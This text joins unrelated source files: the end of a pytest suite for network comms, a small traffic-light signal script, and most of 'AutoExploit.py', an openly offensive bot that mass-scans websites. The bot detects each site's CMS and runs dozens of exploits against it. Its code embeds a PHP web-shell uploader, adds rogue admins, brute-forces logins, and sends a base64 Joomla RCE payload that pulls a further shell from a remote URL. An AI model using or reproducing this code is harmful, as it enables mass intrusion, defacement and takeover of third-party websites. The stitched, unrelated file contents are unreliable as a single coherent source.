yield comm.read()
with pytest.raises(CommClosedError):
yield comm.write("foo")
assert comm.closed()
comm = yield connect(contact_addr)
comm.write("foo")
start = time()
while not comm.closed():
yield gen.sleep(0.01)
assert time() < start + 2
comm.close()
comm.close()
#
# Various stress tests
#
@gen.coroutine
def check_connect_timeout(addr):
t1 = time()
with pytest.raises(IOError):
yield connect(addr, timeout=0.15)
dt = time() - t1
assert 1 >= dt >= 0.1
@gen_test()
def test_tcp_connect_timeout():
yield check_connect_timeout('tcp://127.0.0.1:44444')
@gen_test()
def test_inproc_connect_timeout():
yield check_connect_timeout(inproc.new_address())
def check_many_listeners(addr):
@gen.coroutine
def handle_comm(comm):
pass
listeners = []
N = 100
for i in range(N):
listener = listen(addr, handle_comm)
listener.start()
listeners.append(listener)
assert len(set(l.listen_address for l in listeners)) == N
assert len(set(l.contact_address for l in listeners)) == N
for listener in listeners:
listener.stop()
@gen_test()
def test_tcp_many_listeners():
check_many_listeners('tcp://127.0.0.1')
check_many_listeners('tcp://0.0.0.0')
check_many_listeners('tcp://')
@gen_test()
def test_inproc_many_listeners():
check_many_listeners('inproc://')
#
# Test deserialization
#
@gen.coroutine
def check_listener_deserialize(addr, deserialize, in_value, check_out):
q = queues.Queue()
@gen.coroutine
def handle_comm(comm):
msg = yield comm.read()
q.put_nowait(msg)
yield comm.close()
with listen(addr, handle_comm, deserialize=deserialize) as listener:
comm = yield connect(listener.contact_address)
yield comm.write(in_value)
out_value = yield q.get()
check_out(out_value)
yield comm.close()
@gen.coroutine
def check_connector_deserialize(addr, deserialize, in_value, check_out):
done = locks.Event()
@gen.coroutine
def handle_comm(comm):
yield comm.write(in_value)
yield done.wait()
yield comm.close()
with listen(addr, handle_comm) as listener:
comm = yield connect(listener.contact_address, deserialize=deserialize)
out_value = yield comm.read()
done.set()
yield comm.close()
check_out(out_value)
@gen.coroutine
def check_deserialize(addr):
"""
Check the "deserialize" flag on connect() and listen().
"""
# Test with Serialize and Serialized objects
msg = {'op': 'update',
'x': b'abc',
'to_ser': [to_serialize(123)],
'ser': Serialized(*serialize(456)),
}
msg_orig = msg.copy()
def check_out_false(out_value):
# Check output with deserialize=False
out_value = out_value.copy() # in case transport passed the object as-is
to_ser = out_value.pop('to_ser')
ser = out_value.pop('ser')
expected_msg = msg_orig.copy()
del expected_msg['ser']
del expected_msg['to_ser']
assert out_value == expected_msg
assert isinstance(ser, Serialized)
assert deserialize(ser.header, ser.frames) == 456
assert isinstance(to_ser, list)
to_ser, = to_ser
# The to_serialize() value could have been actually serialized
# or not (it's a transport-specific optimization)
if isinstance(to_ser, Serialized):
assert deserialize(to_ser.header, to_ser.frames) == 123
else:
assert to_ser == to_serialize(123)
def check_out_true(out_value):
# Check output with deserialize=True
expected_msg = msg.copy()
expected_msg['ser'] = 456
expected_msg['to_ser'] = [123]
assert out_value == expected_msg
yield check_listener_deserialize(addr, False, msg, check_out_false)
yield check_connector_deserialize(addr, False, msg, check_out_false)
yield check_listener_deserialize(addr, True, msg, check_out_true)
yield check_connector_deserialize(addr, True, msg, check_out_true)
# Test with long bytestrings, large enough to be transferred
# as a separate payload
_uncompressible = os.urandom(1024 ** 2) * 4 # end size: 8 MB
msg = {'op': 'update',
'x': _uncompressible,
'to_ser': [to_serialize(_uncompressible)],
'ser': Serialized(*serialize(_uncompressible)),
}
msg_orig = msg.copy()
def check_out(deserialize_flag, out_value):
# Check output with deserialize=False
assert sorted(out_value) == sorted(msg_orig)
out_value = out_value.copy() # in case transport passed the object as-is
to_ser = out_value.pop('to_ser')
ser = out_value.pop('ser')
expected_msg = msg_orig.copy()
del expected_msg['ser']
del expected_msg['to_ser']
assert out_value == expected_msg
if deserialize_flag:
assert isinstance(ser, (bytes, bytearray))
assert bytes(ser) == _uncompressible
else:
assert isinstance(ser, Serialized)
assert deserialize(ser.header, ser.frames) == _uncompressible
assert isinstance(to_ser, list)
to_ser, = to_ser
# The to_serialize() value could have been actually serialized
# or not (it's a transport-specific optimization)
if isinstance(to_ser, Serialized):
assert deserialize(to_ser.header, to_ser.frames) == _uncompressible
else:
assert to_ser == to_serialize(_uncompressible)
yield check_listener_deserialize(addr, False, msg, partial(check_out, False))
yield check_connector_deserialize(addr, False, msg, partial(check_out, False))
yield check_listener_deserialize(addr, True, msg, partial(check_out, True))
yield check_connector_deserialize(addr, True, msg, partial(check_out, True))
@pytest.mark.xfail(reason='intermittent failure on windows')
@gen_test()
def test_tcp_deserialize():
yield check_deserialize('tcp://')
@gen_test()
def test_inproc_deserialize():
yield check_deserialize('inproc://')
@gen.coroutine
def check_deserialize_roundtrip(addr):
"""
Sanity check round-tripping with "deserialize" on and off.
"""
# Test with long bytestrings, large enough to be transferred
# as a separate payload
_uncompressible = os.urandom(1024 ** 2) * 4 # end size: 4 MB
msg = {'op': 'update',
'x': _uncompressible,
'to_ser': [to_serialize(_uncompressible)],
'ser': Serialized(*serialize(_uncompressible)),
}
for should_deserialize in (True, False):
a, b = yield get_comm_pair(addr, deserialize=should_deserialize)
yield a.write(msg)
got = yield b.read()
yield b.write(got)
got = yield a.read()
assert sorted(got) == sorted(msg)
for k in ('op', 'x'):
assert got[k] == msg[k]
if should_deserialize:
assert isinstance(got['to_ser'][0], (bytes, bytearray))
assert isinstance(got['ser'], (bytes, bytearray))
else:
assert isinstance(got['to_ser'][0], (to_serialize, Serialized))
assert isinstance(got['ser'], Serialized)
@gen_test()
def test_inproc_deserialize_roundtrip():
yield check_deserialize_roundtrip('inproc://')
@gen_test()
def test_tcp_deserialize_roundtrip():
yield check_deserialize_roundtrip('tcp://')
def _raise_eoferror():
raise EOFError
class _EOFRaising(object):
def __reduce__(self):
return _raise_eoferror, ()
@gen.coroutine
def check_deserialize_eoferror(addr):
"""
EOFError when deserializing should close the comm.
"""
@gen.coroutine
def handle_comm(comm):
yield comm.write({'data': to_serialize(_EOFRaising())})
with pytest.raises(CommClosedError):
yield comm.read()
with listen(addr, handle_comm) as listener:
comm = yield connect(listener.contact_address, deserialize=deserialize)
with pytest.raises(CommClosedError):
yield comm.read()
@gen_test()
def test_tcp_deserialize_eoferror():
yield check_deserialize_eoferror('tcp://')
#
# Test various properties
#
@gen.coroutine
def check_repr(a, b):
assert 'closed' not in repr(a)
assert 'closed' not in repr(b)
yield a.close()
assert 'closed' in repr(a)
yield b.close()
assert 'closed' in repr(b)
@gen_test()
def test_tcp_repr():
a, b = yield get_tcp_comm_pair()
assert a.local_address in repr(b)
assert b.local_address in repr(a)
yield check_repr(a, b)
@gen_test()
def test_tls_repr():
a, b = yield get_tls_comm_pair()
assert a.local_address in repr(b)
assert b.local_address in repr(a)
yield check_repr(a, b)
@gen_test()
def test_inproc_repr():
a, b = yield get_inproc_comm_pair()
assert a.local_address in repr(b)
assert b.local_address in repr(a)
yield check_repr(a, b)
@gen.coroutine
def check_addresses(a, b):
assert a.peer_address == b.local_address
assert a.local_address == b.peer_address
a.abort()
b.abort()
@gen_test()
def test_tcp_adresses():
a, b = yield get_tcp_comm_pair()
yield check_addresses(a, b)
@gen_test()
def test_tls_adresses():
a, b = yield get_tls_comm_pair()
yield check_addresses(a, b)
@gen_test()
def test_inproc_adresses():
a, b = yield get_inproc_comm_pair()
yield check_addresses(a, b)
|
ampel.py
|
import subprocess
import threading
import time
import traceback
import common
import config
class Ampel:
def __init__(self, base_command):
self.base_command = base_command
def signal(self, order, switchto):
switch = '1' if switchto else '0'
cmd = self.base_command + ['-as', str(order), switch]
return subprocess.check_output(cmd, stderr=subprocess.STDOUT)
def flash(self, duration):
def do_flash():
try:
started = time.time()
while True:
elapsed = time.time() - started
if elapsed > duration:
[self.signal(x, 0) for x in range(3)]
return
else:
[self.signal(x, 1) for x in range(3)]
time.sleep(1)
[self.signal(x, 0) for x in range(3)]
except:
tb = traceback.format_exc()
common.error(tb)
flash_thread = threading.Thread(target=do_flash)
flash_thread.start()
return flash_thread
def check_status(self):
try:
out = subprocess.check_output(self.base_command + ['-l'], stderr=subprocess.STDOUT)
return 0, out
except subprocess.CalledProcessError as e:
return e.returncode, e.output
if __name__ == '__main__':
ampel = Ampel(config.cleware_exec)
ret, out = ampel.signal(0, 1)
|
AutoExploit.py
|
#!/usr/bin/python27
import os, re, sys, socket, binascii, time, json, random, threading
from Queue import Queue
try:
import requests
except ImportError:
print '---------------------------------------------------'
print '[*] pip install requests'
print ' [-] you need to install requests Module'
sys.exit()
class AutoExploiter(object):
def __init__(self):
try:
os.mkdir('result')
except:
pass
try:
os.mkdir('logs')
except:
pass
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
self.m = '\033[35m'
self.c = '\033[36m'
self.w = '\033[37m'
self.rr = '\033[39m'
self.shell_code = '''
<title>wordpress_project</title>
<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }
else { echo '<b>Not uploaded ! </b><br><br>'; }
}
?>
'''
self.version = '1.5.1'
self.year = time.strftime("%y")
self.month = time.strftime("%m")
self.EMail = 'email@email.com' # --> add your email for Add admin, Password Will send to this EMail!
self.Jce_Deface_image = 'files/pwn.gif'
self._shell = 'files/shell.jpg'
self.indeX = 'files/index.jpg'
self.TextindeX = 'files/vuln.txt'
self.MailPoetZipShell = 'files/rock.zip'
self.ZipJd = 'files/jdownlods.zip'
self.pagelinesExploitShell = 'files/settings_auto.php'
self.jdShell = 'files/vuln.php3.j'
self.ShellPresta = 'files/up.php'
self.gravShell = 'files/grav.jpg'
try:
self.select = sys.argv[1]
except:
self.cls()
self.print_logo()
self.Print_options()
sys.exit()
if self.select == str('1'): # Single
self.cls()
self.print_logo()
self.Url = raw_input(self.r + ' [+]' + self.c + 'Enter Target: ' + self.y)
if self.Url.startswith("http://"):
self.Url = self.Url.replace("http://", "")
elif self.Url.startswith("https://"):
self.Url = self.Url.replace("https://", "")
else:
pass
try:
CheckOsc = requests.get('http://' + self.Url + '/admin/images/cal_date_over.gif', timeout=10)
CheckOsc2 = requests.get('http://' + self.Url + '/admin/login.php', timeout=10)
CheckCMS = requests.get('http://' + self.Url + '/templates/system/css/system.css', timeout=5)
Checktwo = requests.get('http://' + self.Url, timeout=5)
if 'Import project-level system CSS' in CheckCMS.text.encode('utf-8') or CheckCMS.status_code == 200:
self.Print_Scanning(self.Url, 'joomla')
self.RCE_Joomla(self.Url)
self.Joomla_TakeADmin(self.Url)
self.Com_AdsManager_Shell(self.Url)
self.alberghiExploit(self.Url)
self.Com_CCkJseblod(self.Url)
self.Com_Fabric(self.Url)
self.Com_Hdflvplayer(self.Url)
self.Com_Jdownloads_shell(self.Url)
self.Com_Joomanager(self.Url)
self.Com_MyBlog(self.Url)
self.Com_Macgallery(self.Url)
self.JCE_shell(self.Url)
self.Com_s5_media_player(self.Url)
self.Com_Jbcatalog(self.Url)
self.Com_SexyContactform(self.Url)
self.Com_rokdownloads(self.Url)
self.Com_extplorer(self.Url)
self.Com_jwallpapers_Shell(self.Url)
self.Com_facileforms(self.Url)
self.JooMLaBruteForce(self.Url)
self.FckEditor(self.Url)
elif '/wp-content/' in Checktwo.text.encode('utf-8'):
self.Print_Scanning(self.Url, 'Wordpress')
self.Revslider_SHELL(self.Url)
self.wysijaExploit(self.Url)
self.WP_User_Frontend(self.Url)
self.Gravity_Forms_Shell(self.Url)
self.HD_WebPlayerSqli(self.Url)
self.pagelinesExploit(self.Url)
self.HeadWayThemeExploit(self.Url)
self.addblockblocker(self.Url)
self.cherry_plugin(self.Url)
self.formcraftExploit_Shell(self.Url)
self.UserProExploit(self.Url)
self.wp_mobile_detector(self.Url)
self.Wp_Job_Manager(self.Url)
self.wp_content_injection(self.Url)
self.Woocomrece(self.Url)
self.viral_optins(self.Url)
self.CateGory_page_icons(self.Url)
self.Downloads_Manager(self.Url)
self.wp_support_plus_responsive_ticket_system(self.Url)
self.wp_miniaudioplayer(self.Url)
self.eshop_magic(self.Url)
self.ungallery(self.Url)
self.barclaycart(self.Url)
self.FckEditor(self.Url)
elif '/sites/default/' in Checktwo.text.encode('utf-8')\
or 'content="Drupal' in Checktwo.text.encode('utf-8'):
self.Print_Scanning(self.Url, 'drupal')
self.DrupalGedden2(self.Url)
self.DrupalBruteForce(self.Url)
self.Drupal_Sqli_Addadmin(self.Url)
self.FckEditor(self.Url)
elif 'GIF89a' in CheckOsc.text.encode('utf-8') or 'osCommerce' in CheckOsc2.text.encode('utf-8'):
self.Print_Scanning(self.Url, 'osCommerce')
self.osCommerce(self.Url)
self.FckEditor(self.Url)
elif 'prestashop' in Checktwo.text.encode('utf-8'):
self.lib(self.Url)
self.psmodthemeoptionpanel(self.Url)
self.tdpsthemeoptionpanel(self.Url)
self.megamenu(self.Url)
self.nvn_export_orders(self.Url)
self.pk_flexmenu(self.Url)
self.wdoptionpanel(self.Url)
self.fieldvmegamenu(self.Url)
self.wg24themeadministration(self.Url)
self.videostab(self.Url)
self.cartabandonmentproOld(self.Url)
self.cartabandonmentpro(self.Url)
self.advancedslider(self.Url)
self.attributewizardpro_x(self.Url)
self.attributewizardpro3(self.Url)
self.attributewizardpro2(self.Url)
self.attributewizardpro(self.Url)
self.jro_homepageadvertise(self.Url)
self.homepageadvertise2(self.Url)
self.homepageadvertise(self.Url)
self.productpageadverts(self.Url)
self.simpleslideshow(self.Url)
self.vtermslideshow(self.Url)
self.soopabanners(self.Url)
self.soopamobile(self.Url)
self.columnadverts(self.Url)
self.FckEditor(self.Url)
elif 'catalog/view/' in Checktwo.text.encode('utf-8'):
self.OpenCart(self.Url)
self.FckEditor(self.Url)
else:
self.Print_Scanning(self.Url, 'Unknown')
self.FckEditor(self.Url)
except:
self.Timeout(self.Url)
sys.exit()
elif self.select == str('2'): # multi List
self.cls()
try:
self.print_logo()
Get_list = raw_input(self.r + ' [+]' + self.c + ' Enter List Websites: ' + self.y)
with open(Get_list, 'r') as zz:
Readlist = zz.read().splitlines()
except IOError:
print self.r + '--------------------------------------------'
print self.r + ' [' + self.y + '-' + self.r + '] ' + self.c + ' List Not Found in Directory!'
sys.exit()
thread = []
for xx in Readlist:
t = threading.Thread(target=self.Work2, args=(xx, ''))
t.start()
thread.append(t)
time.sleep(0.1)
for j in thread:
j.join()
elif self.select == str('4'):
try:
self.cls()
self.print_logo()
GoT = requests.get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/update.txt', timeout=5)
if self.version in GoT.text.encode('utf-8'):
print self.r + ' [' + self.y + '-' + self.r + '] ' + self.c +\
"Sorry But You Don't Have New Update ... Try later."
else:
Loop = True
print self.r + ' [' + self.c + '+' + self.r + '] ' + self.g + 'update Is available! Update Now.'
print self.r + ' [' + self.c + '+' + self.r + '] ' + self.y + 'github.com/04x/ICG-AutoExploiterBoT/\n'
while Loop:
Get = raw_input(self.r + ' [' + self.g + '*' + self.r + '] ' + self.c +
'You Want know What is New in New Version ? [y]es or [n]o : ')
if Get == str('y'):
update_details = requests.get('https://raw.githubusercontent.com/'
'04x/ICG-AutoExploiterBoT/master/files/update_details.txt', timeout=5)
print update_details.text.encode('utf-8')
Loop = False
elif Get == str('n'):
self.cls()
self.print_logo()
Loop = False
else:
continue
except:
self.Timeout('Github.com')
elif self.select == str('3'):
self.cls()
self.print_logo()
self.concurrent = 75
try:
self.Get_list = raw_input(self.r + ' [+]' + self.c + ' Enter List Websites: ' + self.y)
except IOError:
print self.r + '--------------------------------------------'
print self.r + ' [' + self.y + '-' + self.r + '] ' + self.c + ' List Not Found in Directory!'
sys.exit()
self.q = Queue(self.concurrent * 2)
for i in range(self.concurrent):
self.t = threading.Thread(target=self.doWork)
self.t.daemon = True
self.t.start()
try:
for url in open(self.Get_list):
self.q.put(url.strip())
self.q.join()
except:
pass
else:
self.cls()
self.print_logo()
print self.r + '--------------------------------------------'
print self.r + ' [' + self.y + '*' + self.r + '] ' + self.c + ' Option Not Found! Try Again...'
# elif self.select == str(3): # IP Server
# self.cls()
# IPserv = raw_input(' Enter IP server: ')
# reverse = reverse_ipz()
# reverse.Reverse_ip(IPserv)
# try:
# with open('logs/' + reverse.ip + '.txt', 'r') as reader:
# readlines = reader.read().splitlines()
# except:
# print ' i cant Find List of urls in server! use from option 2.'
# sys.exit()
# for xx in readlines:
# self.Url = xx
# if self.Url.startswith("http://"):
# self.Url = self.Url.replace("http://", "")
# elif self.Url.startswith("https://"):
# self.Url = self.Url.replace("https://", "")
# else:
# pass
# try:
# CheckCMS = requests.get('http://' + self.Url + '/language/en-GB/en-GB.xml', timeout=7)
# if 'version="' in CheckCMS.text.encode('utf-8'):
# self.Print_Scanning(self.Url, 'joomla')
# self.RCE_Joomla()
# self.Joomla_TakeADmin()
# self.Com_AdsManager_Shell()
# self.alberghiExploit()
# self.Com_CCkJseblod()
# self.Com_Fabric()
# self.Com_Hdflvplayer()
# self.Com_Jdownloads_shell()
# self.Com_Joomanager()
# self.Com_MyBlog()
# self.Com_Macgallery()
# self.JCE_shell()
# self.Com_s5_media_player()
# else:
# self.Print_Scanning(self.Url, 'Unknown')
# except requests.ConnectionError:
# self.Timeout(self.Url)
def Work2(self, url, s):
try:
if url.startswith("http://"):
url = url.replace("http://", "")
elif url.startswith("https://"):
url = url.replace("https://", "")
else:
pass
CheckOsc = requests.get('http://' + url + '/admin/images/cal_date_over.gif', timeout=10)
CheckOsc2 = requests.get('http://' + url + '/admin/login.php', timeout=10)
CheckCMS = requests.get('http://' + url + '/templates/system/css/system.css', timeout=5)
Checktwo = requests.get('http://' + url, timeout=5)
if 'Import project-level system CSS' in CheckCMS.text.encode('utf-8') or CheckCMS.status_code == 200:
self.RCE_Joomla(url)
self.Joomla_TakeADmin(url)
self.Com_AdsManager_Shell(url)
self.alberghiExploit(url)
self.Com_CCkJseblod(url)
self.Com_Fabric(url)
self.Com_Hdflvplayer(url)
self.Com_Jdownloads_shell(url)
self.Com_Joomanager(url)
self.Com_MyBlog(url)
self.Com_Macgallery(url)
self.JCE_shell(url)
self.Com_s5_media_player(url)
self.Com_Jbcatalog(url)
self.Com_SexyContactform(url)
self.Com_rokdownloads(url)
self.Com_extplorer(url)
self.Com_jwallpapers_Shell(url)
self.Com_facileforms(url)
self.JooMLaBruteForce(url)
self.FckEditor(url)
self.q.task_done()
elif '/wp-content/' in Checktwo.text.encode('utf-8'):
self.Revslider_SHELL(url)
self.wysijaExploit(url)
self.WP_User_Frontend(url)
self.Gravity_Forms_Shell(url)
self.HD_WebPlayerSqli(url)
self.pagelinesExploit(url)
self.HeadWayThemeExploit(url)
self.addblockblocker(url)
self.cherry_plugin(url)
self.formcraftExploit_Shell(url)
self.UserProExploit(url)
self.wp_mobile_detector(url)
self.Wp_Job_Manager(url)
self.wp_content_injection(url)
self.viral_optins(url)
self.Woocomrece(url)
self.CateGory_page_icons(url)
self.Downloads_Manager(url)
self.wp_support_plus_responsive_ticket_system(url)
self.wp_miniaudioplayer(url)
self.eshop_magic(url)
self.ungallery(url)
self.barclaycart(url)
self.FckEditor(url)
self.q.task_done()
elif '/sites/default/' in Checktwo.text.encode('utf-8') \
or 'content="Drupal' in Checktwo.text.encode('utf-8'):
self.Drupal_Sqli_Addadmin(url)
self.DrupalGedden2(url)
self.DrupalBruteForce(url)
self.FckEditor(url)
self.q.task_done()
elif 'GIF89a' in CheckOsc.text.encode('utf-8') or 'osCommerce' in CheckOsc2.text.encode('utf-8'):
self.osCommerce(url)
self.FckEditor(url)
self.q.task_done()
elif 'prestashop' in Checktwo.text.encode('utf-8'):
self.lib(url)
self.psmodthemeoptionpanel(url)
self.tdpsthemeoptionpanel(url)
self.megamenu(url)
self.nvn_export_orders(url)
self.pk_flexmenu(url)
self.wdoptionpanel(url)
self.fieldvmegamenu(url)
self.wg24themeadministration(url)
self.videostab(url)
self.cartabandonmentproOld(url)
self.cartabandonmentpro(url)
self.advancedslider(url)
self.attributewizardpro_x(url)
self.attributewizardpro3(url)
self.attributewizardpro2(url)
self.attributewizardpro(url)
self.jro_homepageadvertise(url)
self.homepageadvertise2(url)
self.homepageadvertise(url)
self.productpageadverts(url)
self.simpleslideshow(url)
self.vtermslideshow(url)
self.soopabanners(url)
self.soopamobile(url)
self.columnadverts(url)
self.FckEditor(url)
self.q.task_done()
elif 'catalog/view/' in Checktwo.text.encode('utf-8'):
self.OpenCart(self.Url)
self.FckEditor(self.Url)
self.q.task_done()
else:
self.FckEditor(url)
self.q.task_done()
except:
pass
def doWork(self):
try:
while True:
url = self.q.get()
if url.startswith('http://'):
url = url.replace('http://', '')
elif url.startswith("https://"):
url = url.replace('https://', '')
else:
pass
try:
CheckOsc = requests.get('http://' + url + '/admin/images/cal_date_over.gif', timeout=10)
CheckOsc2 = requests.get('http://' + url + '/admin/login.php', timeout=10)
CheckCMS = requests.get('http://' + url + '/templates/system/css/system.css', timeout=5)
Checktwo = requests.get('http://' + url, timeout=5)
if 'Import project-level system CSS' in CheckCMS.text.encode('utf-8') or CheckCMS.status_code == 200:
self.RCE_Joomla(url)
self.Joomla_TakeADmin(url)
self.Com_AdsManager_Shell(url)
self.alberghiExploit(url)
self.Com_CCkJseblod(url)
self.Com_Fabric(url)
self.Com_Hdflvplayer(url)
self.Com_Jdownloads_shell(url)
self.Com_Joomanager(url)
self.Com_MyBlog(url)
self.Com_Macgallery(url)
self.JCE_shell(url)
self.Com_s5_media_player(url)
self.Com_Jbcatalog(url)
self.Com_SexyContactform(url)
self.Com_rokdownloads(url)
self.Com_extplorer(url)
self.Com_jwallpapers_Shell(url)
self.Com_facileforms(url)
self.JooMLaBruteForce(url)
self.FckEditor(url)
self.q.task_done()
elif '/wp-content/' in Checktwo.text.encode('utf-8'):
self.Revslider_SHELL(url)
self.wysijaExploit(url)
self.WP_User_Frontend(url)
self.Gravity_Forms_Shell(url)
self.HD_WebPlayerSqli(url)
self.pagelinesExploit(url)
self.HeadWayThemeExploit(url)
self.addblockblocker(url)
self.cherry_plugin(url)
self.formcraftExploit_Shell(url)
self.UserProExploit(url)
self.wp_mobile_detector(url)
self.Wp_Job_Manager(url)
self.wp_content_injection(url)
self.viral_optins(url)
self.Woocomrece(url)
self.CateGory_page_icons(url)
self.Downloads_Manager(url)
self.wp_support_plus_responsive_ticket_system(url)
self.wp_miniaudioplayer(url)
self.eshop_magic(url)
self.ungallery(url)
self.barclaycart(url)
self.FckEditor(url)
self.q.task_done()
elif '/sites/default/' in Checktwo.text.encode('utf-8') \
or 'content="Drupal' in Checktwo.text.encode('utf-8'):
self.Drupal_Sqli_Addadmin(url)
self.DrupalGedden2(url)
self.DrupalBruteForce(url)
self.FckEditor(url)
self.q.task_done()
elif 'GIF89a' in CheckOsc.text.encode('utf-8') or 'osCommerce' in CheckOsc2.text.encode('utf-8'):
self.osCommerce(url)
self.FckEditor(url)
self.q.task_done()
elif 'prestashop' in Checktwo.text.encode('utf-8'):
self.lib(url)
self.psmodthemeoptionpanel(url)
self.tdpsthemeoptionpanel(url)
self.megamenu(url)
self.nvn_export_orders(url)
self.pk_flexmenu(url)
self.wdoptionpanel(url)
self.fieldvmegamenu(url)
self.wg24themeadministration(url)
self.videostab(url)
self.cartabandonmentproOld(url)
self.cartabandonmentpro(url)
self.advancedslider(url)
self.attributewizardpro_x(url)
self.attributewizardpro3(url)
self.attributewizardpro2(url)
self.attributewizardpro(url)
self.jro_homepageadvertise(url)
self.homepageadvertise2(url)
self.homepageadvertise(url)
self.productpageadverts(url)
self.simpleslideshow(url)
self.vtermslideshow(url)
self.soopabanners(url)
self.soopamobile(url)
self.columnadverts(url)
self.FckEditor(url)
self.q.task_done()
elif 'catalog/view/' in Checktwo.text.encode('utf-8'):
self.OpenCart(self.Url)
self.FckEditor(self.Url)
self.q.task_done()
else:
self.FckEditor(url)
self.q.task_done()
except:
pass
except:
pass
def print_logo(self):
clear = "\x1b[0m"
colors = [36, 32, 34, 35, 31, 37]
x = """
White HaT Hackers
_ ______ _ _ _
/\ | | | ____| | | (_) |
/ \ _ _| |_ ___ | |__ __ ___ __ | | ___ _| |_ ___ _ __
/ /\ \| | | | __/ _ \| __| \ \/ / '_ \| |/ _ \| | __/ _ \ '__|
/ ____ \ |_| | || (_) | |____ > <| |_) | | (_) | | || __/ |
/_/ \_\__,_|\__\___/|______/_/\_\ .__/|_|\___/|_|\__\___|_|
| |
IRan-Cyber.Net |_| gitHub.com/04x
Note! : We don't Accept any responsibility for any illegal usage.
"""
for N, line in enumerate(x.split("\n")):
sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
time.sleep(0.05)
def Print_options(self):
print self.r + ' [' + self.y + '1' + self.r + '] ' + self.c + 'Single Target' + self.w +\
' [ ' + 'python AutoExploit.py 1' + ' ]'
print self.r + ' [' + self.y + '2' + self.r + '] ' + self.c + 'List Scan' + self.w + ' [ ' + 'python AutoExploit.py 2' + ' ]'
print self.r + ' [' + self.y + '3' + self.r + '] ' + self.c + 'Thread List Scan' + self.w + ' [ ' + 'python AutoExploit.py 3' + ' ]'
print self.r + ' [' + self.y + '4' + self.r + '] ' + self.c + 'Check Update' + self.w + ' [ ' + 'python AutoExploit.py 4' + ' ]'
def Print_Scanning(self, url, CMS):
print self.r + ' [' + self.y + '*' + self.r + '] ' + self.c + url + self.w + ' [ ' + CMS + ' ]'
def Timeout(self, url):
print self.r + ' [' + self.y + '*' + self.r + '] ' + self.c + url + self.r + ' [ TimeOut!!/NotValid Url ]'
def Print_NotVuln(self, NameVuln, site):
print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' + self.y + NameVuln + self.c + ' [Not Vuln]'
def Print_Username_Password(self, username, Password):
print self.y + ' [' + self.c + '+' + self.y + '] ' + self.c + 'Username: ' + self.g + username
print self.y + ' [' + self.c + '+' + self.y + '] ' + self.c + 'Password: ' + self.g + Password
def Print_Vuln(self, NameVuln, site):
print self.c + ' [' + self.y + '+' + self.c + '] ' + self.r + site + ' ' + self.y + NameVuln + self.g + ' [Vuln!!]'
def Print_Vuln_index(self, indexPath):
print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + indexPath + self.g + ' [Index Uploaded!]'
def Print_vuln_Shell(self, shellPath):
print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + shellPath + self.g + ' [Shell Uploaded!]'
def Print_vuln_Config(self, pathconfig):
print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + pathconfig + self.g + ' [Config Downloaded!]'
def cls(self):
linux = 'clear'
windows = 'cls'
os.system([linux, windows][os.name == 'nt'])
def RCE_Joomla(self, site):
try:
pl = self.generate_payload(
"base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvdG1wL3Z1bG4yLnBocCIgOw0KJGZwPWZvcGVuKCIkY2hlY2siLCJ3KyIpOw0KZndyaXRlKCRmcCxiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtWjFibU4wYVc5dUlHaDBkSEJmWjJWMEtDUjFjbXdwZXcwS0NTUnBiU0E5SUdOMWNteGZhVzVwZENna2RYSnNLVHNOQ2dsamRYSnNYM05sZEc5d2RDZ2thVzBzSUVOVlVreFBVRlJmVWtWVVZWSk9WRkpCVGxOR1JWSXNJREVwT3cwS0NXTjFjbXhmYzJWMGIzQjBLQ1JwYlN3Z1ExVlNURTlRVkY5RFQwNU9SVU5VVkVsTlJVOVZWQ3dnTVRBcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOUdUMHhNVDFkTVQwTkJWRWxQVGl3Z01TazdEUW9KWTNWeWJGOXpaWFJ2Y0hRb0pHbHRMQ0JEVlZKTVQxQlVYMGhGUVVSRlVpd2dNQ2s3RFFvSmNtVjBkWEp1SUdOMWNteGZaWGhsWXlna2FXMHBPdzBLQ1dOMWNteGZZMnh2YzJVb0pHbHRLVHNOQ24wTkNpUmphR1ZqYXlBOUlDUmZVMFZTVmtWU1d5ZEVUME5WVFVWT1ZGOVNUMDlVSjEwZ0xpQWlMM1J0Y0M5MmRXeHVMbkJvY0NJZ093MEtKSFJsZUhRZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0hNNkx5OXlZWGN1WjJsMGFIVmlkWE5sY21OdmJuUmxiblF1WTI5dEx6QTBlQzlKUTBjdFFYVjBiMFY0Y0d4dmFYUmxja0p2VkM5dFlYTjBaWEl2Wm1sc1pYTXZkWEF1Y0dod0p5azdEUW9rYjNCbGJpQTlJR1p2Y0dWdUtDUmphR1ZqYXl3Z0ozY25LVHNOQ21aM2NtbDBaU2drYjNCbGJpd2dKSFJsZUhRcE93MEtabU5zYjNObEtDUnZjR1Z1S1RzTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSamFHVmpheWtwZXcwS0lDQWdJR1ZqYUc4Z0pHTm9aV05yTGlJOEwySnlQaUk3RFFwOVpXeHpaU0FOQ2lBZ1pXTm9ieUFpYm05MElHVjRhWFJ6SWpzTkNtVmphRzhnSW1SdmJtVWdMbHh1SUNJZ093MEtKR05vWldOck1pQTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDJsdFlXZGxjeTkyZFd4dUxuQm9jQ0lnT3cwS0pIUmxlSFF5SUQwZ2FIUjBjRjluWlhRb0oyaDBkSEJ6T2k4dmNtRjNMbWRwZEdoMVluVnpaWEpqYjI1MFpXNTBMbU52YlM4d05IZ3ZTVU5ITFVGMWRHOUZlSEJzYjJsMFpYSkNiMVF2YldGemRHVnlMMlpwYkdWekwzVndMbkJvY0NjcE93MEtKRzl